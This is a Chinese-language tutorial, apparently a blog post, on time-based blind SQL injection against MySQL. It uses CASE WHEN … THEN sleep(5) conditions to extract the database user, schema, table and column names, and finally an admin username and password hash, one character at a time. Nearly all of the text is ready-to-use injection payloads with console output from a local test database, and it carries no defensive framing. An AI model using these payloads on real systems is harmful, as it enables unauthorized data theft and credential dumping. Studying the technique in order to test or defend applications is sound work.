0x00 记忆方式
and case when(substring(表达式 from 1 for 1)=判断条件) then sleep(5) else 0 end;
0x01 基本数据
mysql> select version();+-----------+| version() |+-----------+| 5.5.53 |+-----------+1 row in set (0.27 sec)mysql> select user();+----------------+| user() |+----------------+| root@localhost |+----------------+1 row in set (0.00 sec)mysql> select database();+------------+| database() |+------------+| test |+------------+1 row in set (0.00 sec)
0x02 获取数据长度
mysql> select length(user());+----------------+| length(user()) |+----------------+| 14 |+----------------+1 row in set (0.00 sec)
数据库语句: select * from tdb_goods where goods_id=1 and case when(length(user())=14) then sleep(5) else 0 end;
mysql> select * from tdb_goods where goods_id=1 and case when(length(user())=14) then sleep(5) else 0 end;Empty set (5.00 sec)
0x03 读取数据库版本/当前连接用户/当前连接的数据库
注意: 读取不同的内容
例如:
select substring(user() from 1 for 1) = r
select substring(user() from 2 for 1) = o
数据库语句: select * from tdb_goods where goods_id=1 and case when(substring(user() from 1 for 1)=’r’) then sleep(5) else 0 end;
mysql> select * from tdb_goods where goods_id=1 and case when(substring(user() from 1 for 1)='r') then sleep(5) else 0 end;Empty set (5.00 sec)
猜对时会延时5秒,一旦延时了5S就可以判断为猜对了
0x04 猜库名
注意: OFFSET 0 修改会显示其他库名
例如:
修改为0 就是出1库
修改为1 就是出2库
// 演示数据mysql> SELECT schema_name FROM information_schema.schemata LIMIT 0,1;+--------------------+| schema_name |+--------------------+| information_schema |+--------------------+1 row in set (0.00 sec)
读取1库库名第一个字: select * from tdb_goods where goods_id=1 and case when(substring((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0) from 1 for 1)=’i’) then sleep(5) else 0 end;
mysql> select * from tdb_goods where goods_id=1 and case when(substring((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0) from 1 for 1)='i') then sleep(5) else 0 end;Empty set (5.00 sec)
读取1库库名第二个字: select * from tdb_goods where goods_id=1 and case when(substring((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0) from 2 for 1)=’n’) then sleep(5) else 0 end;
mysql> select * from tdb_goods where goods_id=1 and case when(substring((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0) from 2 for 1)='n') then sleep(5) else 0 end;Empty set (5.00 sec)
0x05 猜表名
注意: table_schema=xxx 修改为其他库会爆出其他库的数据
例如:
table_schema=database() 会获取当前连接的库数据
table_schema=’test’ 会获取test库数据
注意: OFFSET 0 修改会显示其他表名
例如:
修改为0 就是出1表
修改为1 就是出2表
// 演示数据mysql> SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1;+------------+| table_name |+------------+| tdb_admin |+------------+1 row in set (0.00 sec)
数据库语句-读取当前库的第一张表名的第一个字: select * from tdb_goods where goods_id=1 and case when(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 1 OFFSET 0) from 1 for 1)=’t’) then sleep(5) else 0 end;
mysql> select * from tdb_goods where goods_id=1 and case when(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 1 OFFSET 0) from 1 for 1)='t') then sleep(5) else 0 end;Empty set (5.00 sec)
数据库语句-读取当前库的第一张表名的第二个字: select * from tdb_goods where goods_id=1 and case when(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 1 OFFSET 0) from 2 for 1)=’d’) then sleep(5) else 0 end;
mysql> select * from tdb_goods where goods_id=1 and case when(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 1 OFFSET 0) from 2 for 1)='d') then sleep(5) else 0 end;Empty set (5.00 sec)
0x06 猜字段
table_schema = “xx” 要爆的数据库名
table_name = “xx” 要爆的表名
OFFSET 0 表示要爆的位置
例如:
表tdb_admin的字段为 id,usernam,password
limit 0 = id
limit 1 = username
limit 2 = password
// 演示数据mysql> SELECT column_name FROM information_schema.columns where table_schema='test' and table_name='tdb_admin' limit 0,1;+-------------+| column_name |+-------------+| id |+-------------+1 row in set (0.00 sec)
猜test库 tdb_admin表的第一个字段名第一个字: select * from tdb_goods where goods_id=1 and case when(substring((SELECT column_name FROM information_schema.columns where table_schema=’test’ and table_name=’tdb_admin’ LIMIT 1 OFFSET 0) from 1 for 1)=’i’) then sleep(5) else 0 end;
mysql> select * from tdb_goods where goods_id=1 and case when(substring((SELECT column_name FROM information_schema.columns where table_schema='test' and table_name='tdb_admin' LIMIT 1 OFFSET 0) from 1 for 1)='i') then sleep(5) else 0 end;Empty set (5.00 sec)
猜test库 tdb_admin表的第一个字段名第二个字: select * from tdb_goods where goods_id=1 and case when(substring((SELECT column_name FROM information_schema.columns where table_schema=’test’ and table_name=’tdb_admin’ LIMIT 1 OFFSET 0) from 2 for 1)=’d’) then sleep(5) else 0 end;
mysql> select * from tdb_goods where goods_id=1 and case when(substring((SELECT column_name FROM information_schema.columns where table_schema='test' and table_name='tdb_admin' LIMIT 1 OFFSET 0) from 2 for 1)='d') then sleep(5) else 0 end;Empty set (5.00 sec)
0x07 猜内容
OFFSET 0 第几条数据 下标从0开始
from 1 第几个字
// 演示数据mysql> SELECT * FROM test.tdb_admin LIMIT 1 OFFSET 0;+----+----------+----------------------------------+| id | username | password |+----+----------+----------------------------------+| 1 | admin | 7fef6171469e80d32c0559f88b377245 |+----+----------+----------------------------------+1 row in set (0.00 sec)
读取某库某表某字段第一个字: select * from tdb_goods where goods_id=1 and case when(substring((SELECT 字段名 FROM 库名.表名 LIMIT 1 OFFSET 0) from 1 for 1)=’a’) then sleep(5) else 0 end;
mysql> select * from tdb_goods where goods_id=1 and case when(substring((SELECT username FROM test.tdb_admin LIMIT 1 OFFSET 0) from 1 for 1)='a') then sleep(5) else 0 end;Empty set (5.00 sec)
读取某库某表某字段第二个字: select * from tdb_goods where goods_id=1 and case when(substring((SELECT username FROM test.tdb_admin LIMIT 1 OFFSET 0) from 2 for 1)=’d’) then sleep(5) else 0 end;
mysql> select * from tdb_goods where goods_id=1 and case when(substring((SELECT username FROM test.tdb_admin LIMIT 1 OFFSET 0) from 2 for 1)='d') then sleep(5) else 0 end;Empty set (5.00 sec)
若有收获,就点个赞吧
0 人点赞
